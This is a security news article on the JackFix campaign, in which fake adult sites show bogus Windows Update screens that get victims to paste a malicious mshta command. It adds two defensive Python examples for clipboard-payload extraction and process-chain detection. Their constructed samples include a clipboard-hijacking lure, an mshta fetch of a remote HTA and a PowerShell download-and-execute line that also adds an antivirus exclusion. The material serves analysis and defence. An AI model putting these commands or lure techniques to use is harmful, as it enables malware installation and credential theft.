JackFix Uses Fake Windows Update Pop-Ups on Adult Sites to Deliver Multiple Stealers

Cybersecurity experts have uncovered a new cyber attack campaign that combines ClickFix lures and fake adult websites to trick users into executing malicious commands disguised as a “critical” Windows security update.

The campaign uses cloned adult websites imitating brands such as xHamster and PornHub to lure victims into installing a supposed security update. Placing the lure in that context adds psychological pressure to comply quickly rather than ask a colleague or the help desk about the prompt.

ClickFix attacks have risen sharply over the past year. They deceive users into running malicious commands themselves under the guise of a technical fix or a human-verification check, which sidesteps many of the controls that would catch a downloaded executable. According to Microsoft data, ClickFix accounted for 47% of the initial access attacks Microsoft observed in that period.

The latest campaign, dubbed JackFix, displays realistic fake Windows Update screens to trick users into running malicious code. The attackers have moved away from the by-now familiar fake CAPTCHA ("verify you are human") lures in favor of a more convincing pretext.

One alarming aspect of this attack is that the fake Windows Update alert takes over the entire screen and instructs the victim to open the Windows Run dialog (Win + R), press Ctrl + V, and hit Enter, which triggers the infection. The lure page has already placed the malicious command on the clipboard with JavaScript, so the victim never types it and only needs to paste and confirm.

The attack begins with users being redirected to a fake adult website via malvertising or other social engineering methods. The site then presents users with a fake “urgent security update” prompt. Some versions of these sites contain developer comments in Russian, hinting at a possible Russian-speaking threat actor.

The fake Windows Update screen is built from HTML and JavaScript that mimic a legitimate Windows Update window. The script is obfuscated to hide the copied command from casual inspection of the page source, and it intercepts keyboard input so the victim cannot simply escape the full-screen overlay.
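To show what an analyst pulls out of such a page, here is an added example (not code from the article or the researchers it cites) that statically recovers the clipboard payload from a lure page's JavaScript. It resolves the simple obfuscation these pages commonly use (string concatenation, atob() decoding, variable indirection) and also reads hidden textareas used with execCommand("copy"). The HTML in SAMPLE_PAGE is a constructed stand-in, and upd-check.invalid is a hypothetical domain.

```python
"""
Static triage of a ClickFix lure page: recover the command the page pushes
onto the clipboard before telling the victim to press Win+R, Ctrl+V, Enter.
Added example, not code from the article or the researchers it cites.
SAMPLE_PAGE is a constructed stand-in for a lure page; upd-check.invalid is
a hypothetical domain.
"""
import base64
import html
import re
from typing import Dict, List

# Constructed lure snippet: full-screen "update" overlay, Escape key trapped,
# the command split between an atob() call and a plain literal, and a hidden
# textarea as a fallback copy path via execCommand("copy").
SAMPLE_PAGE = r"""
<div id="upd" style="position:fixed;inset:0;background:#0078d7;color:#fff">
  Working on updates, 3% complete. Press Win + R, then Ctrl + V, then Enter.
</div>
<textarea id="c" style="position:absolute;left:-9999px">mshta https://upd-check.invalid/x.hta</textarea>
<script>
  document.addEventListener("keydown", e => { if (e.key === "Escape") e.preventDefault(); });
  document.documentElement.requestFullscreen();
  const p = atob("bXNodGE=") + " https://upd-check.invalid/x.hta";
  document.body.onclick = () => {
    navigator.clipboard.writeText(p);
    document.getElementById("c").select(); document.execCommand("copy");
  };
</script>
"""

SUSPICIOUS = re.compile(r"\b(mshta|powershell|pwsh|cmd|curl|certutil|bitsadmin|rundll32)\b", re.I)
ATOB = re.compile(r"""atob\(\s*(['"])(.*?)\1\s*\)""")
LITERAL = re.compile(r"""(['"])(.*?)\1""")
ASSIGN = re.compile(r"(?:const|let|var)\s+([A-Za-z_$][\w$]*)\s*=\s*([^;]+);")
IDENT = re.compile(r"[A-Za-z_$][\w$]*")
TEXTAREA = re.compile(r"<textarea[^>]*>(.*?)</textarea>", re.S | re.I)


def split_top_level_plus(expr: str) -> List[str]:
    """Split a JS expression on '+' operators that are not inside a string literal."""
    parts, buf, quote = [], [], None
    for ch in expr:
        if quote:
            buf.append(ch)
            if ch == quote:
                quote = None
        elif ch in "'\"":
            quote = ch
            buf.append(ch)
        elif ch == "+":
            parts.append("".join(buf))
            buf = []
        else:
            buf.append(ch)
    parts.append("".join(buf))
    return parts


def eval_js_string_expr(expr: str, assigns: Dict[str, str], depth: int = 0) -> str:
    """Evaluate the small JS subset lure pages use to build the command:
    literals (no escaped quotes), atob("..."), '+' concatenation and simple
    variable references. Anything else is kept as <expr> so it stays visible."""
    out = []
    for part in split_top_level_plus(expr):
        part = part.strip()
        if (m := ATOB.fullmatch(part)):
            out.append(base64.b64decode(m.group(2)).decode("utf-8", "replace"))
        elif (m := LITERAL.fullmatch(part)):
            out.append(m.group(2))
        elif IDENT.fullmatch(part) and part in assigns and depth < 8:
            out.append(eval_js_string_expr(assigns[part], assigns, depth + 1))
        else:
            out.append(f"<{part}>")
    return "".join(out)


def call_args(js: str, func: str) -> List[str]:
    """Return the raw argument text of each `func(...)` call, honouring nested
    parentheses and quotes (a lazy regex would stop at the first ')')."""
    found, start = [], 0
    while (i := js.find(func + "(", start)) >= 0:
        j = k = i + len(func) + 1
        depth, quote = 1, None
        while k < len(js) and depth:
            ch = js[k]
            if quote:
                quote = None if ch == quote else quote
            elif ch in "'\"":
                quote = ch
            elif ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            k += 1
        found.append(js[j:k - 1])
        start = k
    return found


def extract_clipboard_payloads(page: str) -> List[str]:
    """Recover every string the page could place on the clipboard, deduplicated."""
    assigns = {name: expr for name, expr in ASSIGN.findall(page)}
    payloads = [eval_js_string_expr(a, assigns) for a in call_args(page, "writeText")]
    payloads += [html.unescape(t).strip() for t in TEXTAREA.findall(page)]
    return list(dict.fromkeys(p for p in payloads if p))


def triage(page: str) -> List[Dict[str, object]]:
    """Pair each recovered payload with a verdict based on LOLBin / downloader keywords."""
    return [{"payload": p, "suspicious": bool(SUSPICIOUS.search(p))}
            for p in extract_clipboard_payloads(page)]


if __name__ == "__main__":
    for item in triage(SAMPLE_PAGE):
        print(("SUSPICIOUS " if item["suspicious"] else "benign     ") + item["payload"])
```

Both copy paths in the sample resolve to the same mshta command, so the output is a single flagged payload. Heavier obfuscation (String.fromCharCode arrays, runtime string decryption) defeats this static pass; at that point the reliable fallback is to load the page in an instrumented browser and read the clipboard after the click handler fires.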

The initial command executed in the attack invokes the legitimate, signed mshta.exe binary with a remote HTA payload, a living-off-the-land technique that avoids dropping an executable at this stage. The HTA in turn runs a PowerShell command that retrieves a further PowerShell script from a remote server, adding another layer of indirection between the pasted command and the actual malware.

The PowerShell script used in the attack employs various obfuscation and anti-analysis methods to evade detection. It attempts to elevate privileges, create antivirus exclusions, and drop multiple payloads, including the information stealers Rhadamanthys and Vidar Stealer 2.0.
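The chain described in the last three paragraphs (Run dialog, mshta.exe with a remote HTA, PowerShell fetching a further stage and carving out an antivirus exclusion) leaves a distinctive process tree. The following is an added detection example, not code from the article or the researchers it cites; it runs three rules over constructed Sysmon-style process-creation records (hypothetical PIDs, paths and the domain update-check.invalid) and reports each hit with its full ancestry.

```python
"""
Detection logic for the JackFix-style process chain: a Run-dialog paste
(explorer.exe) launching mshta.exe with a remote HTA, which spawns PowerShell
that downloads a further stage and adds an antivirus exclusion.
Added example, not code from the article or the researchers it cites. The
events are constructed Sysmon-style process-creation records with
hypothetical PIDs, paths and domains, not real telemetry.
"""
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

# Constructed sample telemetry. The first three events are the attack chain;
# the last is a benign local HTA run for comparison.
SAMPLE_EVENTS: List[Event] = [
    {"pid": "1200", "ppid": "900", "image": r"C:\Windows\explorer.exe",
     "parent": r"C:\Windows\System32\winlogon.exe", "cmdline": "explorer.exe"},
    # Victim pastes the lure's clipboard content into Win+R: explorer.exe spawns mshta.exe.
    {"pid": "4412", "ppid": "1200", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": "mshta https://update-check.invalid/win.hta"},
    # The HTA runs PowerShell to fetch the next stage and adds a Defender exclusion.
    {"pid": "4480", "ppid": "4412",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": 'powershell -w hidden -ep bypass -c "Add-MpPreference -ExclusionPath $env:TEMP; '
                'iex (iwr https://update-check.invalid/s.ps1)"'},
    # Benign: an admin running mshta on a local file from an elevated PowerShell.
    {"pid": "5000", "ppid": "4999", "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"mshta C:\tools\report.hta"},
]


def _base(path: str) -> str:
    """Lower-cased file name of an image path."""
    return path.rsplit("\\", 1)[-1].lower()


# (rule name, MITRE ATT&CK technique, predicate over one event)
RULES: List[Tuple[str, str, Callable[[Event], bool]]] = [
    # Win+R launches via explorer.exe; mshta pulling a URL from there is the entry point.
    ("mshta_remote_hta_from_explorer", "T1218.005",
     lambda e: _base(e["image"]) == "mshta.exe" and _base(e["parent"]) == "explorer.exe"
     and re.search(r"https?://", e["cmdline"], re.I) is not None),
    # The HTA's next hop: PowerShell as a child of mshta.exe is rarely legitimate.
    ("powershell_child_of_mshta", "T1059.001",
     lambda e: _base(e["image"]) in ("powershell.exe", "pwsh.exe")
     and _base(e["parent"]) == "mshta.exe"),
    # Defense evasion step named in the article: carving out an antivirus exclusion.
    ("antivirus_exclusion_added", "T1562.001",
     lambda e: re.search(r"add-mppreference\s+-exclusion", e["cmdline"], re.I) is not None),
]


def ancestry(by_pid: Dict[str, Event], pid: str, max_depth: int = 8) -> str:
    """Walk ppid links to build 'root > ... > leaf'; stops at unknown PIDs or cycles."""
    names, seen = [], set()
    while pid in by_pid and pid not in seen and len(names) < max_depth:
        seen.add(pid)
        names.append(_base(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return " > ".join(reversed(names))


def detect(events: List[Event]) -> List[Dict[str, str]]:
    """Apply every rule to every event; each hit carries the process ancestry for triage."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        for name, technique, pred in RULES:
            if pred(e):
                alerts.append({"rule": name, "technique": technique, "pid": e["pid"],
                               "chain": ancestry(by_pid, e["pid"]), "cmdline": e["cmdline"]})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"[{a['technique']}] {a['rule']}: pid {a['pid']} ({a['chain']})")
```

The benign local HTA run produces no alert because the first rule keys on both the explorer.exe parent and a URL argument; tuning for your environment usually means adding known good HTA paths to an allow list rather than loosening either condition. The same three predicates translate directly into Sysmon, Defender for Endpoint or Sigma rules.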

The disclosure of this attack coincides with Huntress revealing a multi-stage malware execution chain that starts with a ClickFix lure posing as a Windows update. The attack deploys stealer malware like Lumma and Rhadamanthys by hiding the final stages within an image using steganography.

Organizations can reduce their exposure to ClickFix attacks by training employees to recognize the pattern (a web page asking them to press Win + R and paste something) and by removing the Run dialog where it is not needed: the Group Policy setting "Remove Run menu from Start Menu" (User Configuration > Administrative Templates > Start Menu and Taskbar) sets the NoRun DWORD to 1 under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer. That control only blocks the Run-dialog variant, however; lures that direct the victim to a PowerShell or Terminal window are unaffected, so process-creation telemetry for mshta.exe and PowerShell spawned from explorer.exe remains the more durable defense.